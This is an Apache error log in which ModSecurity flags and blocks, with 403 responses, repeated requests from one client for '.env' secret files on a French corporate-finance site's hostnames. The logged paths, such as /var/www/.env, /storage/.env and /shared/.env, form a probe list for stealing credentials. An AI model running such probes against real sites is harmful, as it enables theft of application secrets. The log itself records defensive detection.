[Mon May 11 16:25:41.049651 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:41500] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/var/www/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-QAAAMI"]
[Mon May 11 16:25:41.050147 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:41500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:41.050310 2026] [security2:error] [pid 1416109:tid 1416132] [client 18.180.54.2:41500] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/var/www/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-QAAAMI"]
[Mon May 11 16:25:41.569520 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:41504] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/storage/.env"] [unique_id "agHm5UWKUxpmnkK7zHx7pQAAAQU"]
[Mon May 11 16:25:41.569724 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:41504] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/storage/.env"] [unique_id "agHm5UWKUxpmnkK7zHx7pQAAAQU"]
[Mon May 11 16:25:41.570243 2026] [core:error] [pid 1411055:tid 1411062] [client 18.180.54.2:41504] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:41.570399 2026] [security2:error] [pid 1411055:tid 1411062] [client 18.180.54.2:41504] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/storage/.env"] [unique_id "agHm5UWKUxpmnkK7zHx7pQAAAQU"]
[Mon May 11 16:25:41.750412 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:41510] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-gAAANA"]
[Mon May 11 16:25:41.750636 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:41510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-gAAANA"]
[Mon May 11 16:25:41.751103 2026] [core:error] [pid 1416109:tid 1416146] [client 18.180.54.2:41510] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:41.751270 2026] [security2:error] [pid 1416109:tid 1416146] [client 18.180.54.2:41510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5VV4kyjgo4bQBUhT-gAAANA"]
[Mon May 11 16:25:42.268608 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:41516] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wgAAAAk"]
[Mon May 11 16:25:42.268852 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:41516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wgAAAAk"]
[Mon May 11 16:25:42.269438 2026] [core:error] [pid 1411099:tid 1411109] [client 18.180.54.2:41516] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:42.269600 2026] [security2:error] [pid 1411099:tid 1411109] [client 18.180.54.2:41516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wgAAAAk"]
[Mon May 11 16:25:42.436984 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:41520] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/current/.env"] [unique_id "agHm5vy_GXSWIKeli0vyBQAAAIU"]
[Mon May 11 16:25:42.437230 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:41520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/current/.env"] [unique_id "agHm5vy_GXSWIKeli0vyBQAAAIU"]
[Mon May 11 16:25:42.437723 2026] [core:error] [pid 1411201:tid 1411251] [client 18.180.54.2:41520] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:42.437887 2026] [security2:error] [pid 1411201:tid 1411251] [client 18.180.54.2:41520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/current/.env"] [unique_id "agHm5vy_GXSWIKeli0vyBQAAAIU"]
[Mon May 11 16:25:42.954509 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:41530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wwAAABA"]
[Mon May 11 16:25:42.954738 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:41530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wwAAABA"]
[Mon May 11 16:25:42.955238 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:41530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:42.955407 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:41530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/var/www/html/.env"] [unique_id "agHm5g-Qm4vhlWBPlMi5wwAAABA"]
[Mon May 11 16:25:43.117854 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:41536] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/release/.env"] [unique_id "agHm5_y_GXSWIKeli0vyBgAAAIQ"]
[Mon May 11 16:25:43.118076 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:41536] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/release/.env"] [unique_id "agHm5_y_GXSWIKeli0vyBgAAAIQ"]
[Mon May 11 16:25:43.118551 2026] [core:error] [pid 1411201:tid 1411250] [client 18.180.54.2:41536] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:43.118707 2026] [security2:error] [pid 1411201:tid 1411250] [client 18.180.54.2:41536] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/release/.env"] [unique_id "agHm5_y_GXSWIKeli0vyBgAAAIQ"]
[Mon May 11 16:25:43.635931 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:41538] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /current/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/current/.env"] [unique_id "agHm51V4kyjgo4bQBUhT_wAAAMg"]
[Mon May 11 16:25:43.636179 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:41538] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/current/.env"] [unique_id "agHm51V4kyjgo4bQBUhT_wAAAMg"]
[Mon May 11 16:25:43.636663 2026] [core:error] [pid 1416109:tid 1416138] [client 18.180.54.2:41538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:43.636824 2026] [security2:error] [pid 1416109:tid 1416138] [client 18.180.54.2:41538] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/current/.env"] [unique_id "agHm51V4kyjgo4bQBUhT_wAAAMg"]
[Mon May 11 16:25:43.833687 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:41542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/releases/.env"] [unique_id "agHm5zJnyuKVXoStDha0WAAAAFg"]
[Mon May 11 16:25:43.833921 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:41542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/releases/.env"] [unique_id "agHm5zJnyuKVXoStDha0WAAAAFg"]
[Mon May 11 16:25:43.834464 2026] [core:error] [pid 1412074:tid 1412100] [client 18.180.54.2:41542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:43.834629 2026] [security2:error] [pid 1412074:tid 1412100] [client 18.180.54.2:41542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/releases/.env"] [unique_id "agHm5zJnyuKVXoStDha0WAAAAFg"]
[Mon May 11 16:25:44.348560 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:41556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /release/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/release/.env"] [unique_id "agHm6EWKUxpmnkK7zHx7qwAAAQM"]
[Mon May 11 16:25:44.348788 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:41556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/release/.env"] [unique_id "agHm6EWKUxpmnkK7zHx7qwAAAQM"]
[Mon May 11 16:25:44.349297 2026] [core:error] [pid 1411055:tid 1411060] [client 18.180.54.2:41556] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:44.350071 2026] [security2:error] [pid 1411055:tid 1411060] [client 18.180.54.2:41556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/release/.env"] [unique_id "agHm6EWKUxpmnkK7zHx7qwAAAQM"]
[Mon May 11 16:25:44.567628 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:41568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/shared/.env"] [unique_id "agHm6Py_GXSWIKeli0vyBwAAAIw"]
[Mon May 11 16:25:44.567865 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:41568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/shared/.env"] [unique_id "agHm6Py_GXSWIKeli0vyBwAAAIw"]
[Mon May 11 16:25:44.568375 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:41568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:44.568536 2026] [security2:error] [pid 1411201:tid 1411258] [client 18.180.54.2:41568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/shared/.env"] [unique_id "agHm6Py_GXSWIKeli0vyBwAAAIw"]
[Mon May 11 16:25:45.050230 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:41572] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /releases/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/releases/.env"] [unique_id "agHm6VV4kyjgo4bQBUhUAAAAANg"]
[Mon May 11 16:25:45.050455 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:41572] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/releases/.env"] [unique_id "agHm6VV4kyjgo4bQBUhUAAAAANg"]
[Mon May 11 16:25:45.051010 2026] [core:error] [pid 1416109:tid 1416154] [client 18.180.54.2:41572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:45.051184 2026] [security2:error] [pid 1416109:tid 1416154] [client 18.180.54.2:41572] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/releases/.env"] [unique_id "agHm6VV4kyjgo4bQBUhUAAAAANg"]
